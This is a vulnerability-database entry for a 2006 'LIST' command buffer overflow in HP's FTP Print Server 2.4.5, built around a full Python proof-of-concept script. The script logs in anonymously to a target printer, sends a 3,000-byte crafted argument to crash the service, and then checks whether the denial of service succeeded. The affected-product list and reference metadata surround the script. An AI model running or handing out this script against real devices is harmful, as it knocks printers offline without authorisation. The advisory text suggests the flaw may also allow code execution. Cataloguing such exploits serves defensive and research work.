ID
VAR-E-200612-0337
EDB ID
29297
TITLE
HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
HP Printer FTP Print Server 2.4.5 - 'LIST' Buffer Overflow.. dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | hp | model: | printer ftp print server | scope: | eq | version: | 2.4.5 | Trust: 1.0 |
vendor: | hp | model: | laserjet series | scope: | eq | version: | 5100 | Trust: 0.3 |
vendor: | hp | model: | laserjet series | scope: | eq | version: | 5000 | Trust: 0.3 |
vendor: | hp | model: | photo digital imaging hpqxml.dll | scope: | eq | version: | 2.0.0.133 | Trust: 0.3 |
vendor: | hp | model: | ftp print server | scope: | eq | version: | 2.4.5 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/21666/info
-HP Printers running FTP Print Server are prone to a buffer-overflow vulnerability. This issue occurs because the application fails to boundscheck user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
#!/usr/bin/python
import sys
from ftplib import FTP
print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print
if len(sys.argv) == 1:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)
target = sys.argv[1]
print "[+] Running attack against " + target
try:
ftp = FTP(target)
except:
print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
sys.exit(0)
try:
msg = ftp.login() # Login anonymously
print msg
except:
print "[!] Error logging anonymously.",sys.exc_info()[1]
sys.exit(0)
buf = "./A"
iMax = 9
for i in range(iMax):
buf += buf
print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "
try:
print "[+] Please, note that sometimes your connection will not be dropped. "
ftp.retrlines("LIST " + buf[0:3000])
print "[!] Exploit doesn't work :("
print
sys.exit(0)
except:
print "[+] Apparently exploit works. Verifying ... "
print sys.exc_info()[1]
ftp2 = FTP(target)
try:
msg = ftp2.login()
print "[!] No, it doesn't work :( "
print
print msg
sys.exit(0)
except:
print "[+] Yes, it works."
print sys.exc_info()[1]
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'LIST' Buffer Overflow
Trust: 1.0
CREDITS
Joxean Koret
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 29297 | Trust: 1.9 |
db: | BID | id: | 21666 | Trust: 1.9 |
db: | EDBNET | id: | 51076 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/21666/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/29297/ | Trust: 0.6 |
url: | http://www.hp.com | Trust: 0.3 |
url: | https://www.exploit-db.com/exploits/29297 | Trust: 0.3 |
SOURCES
db: | BID | id: | 21666 |
db: | EXPLOIT-DB | id: | 29297 |
db: | EDBNET | id: | 51076 |
LAST UPDATE DATE
2022-07-27T09:57:45.069000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 21666 | date: | 2006-12-19T19:27:00 |
SOURCES RELEASE DATE
db: | BID | id: | 21666 | date: | 2006-12-19T00:00:00 |
db: | EXPLOIT-DB | id: | 29297 | date: | 2006-12-19T00:00:00 |
db: | EDBNET | id: | 51076 | date: | 2006-12-19T00:00:00 |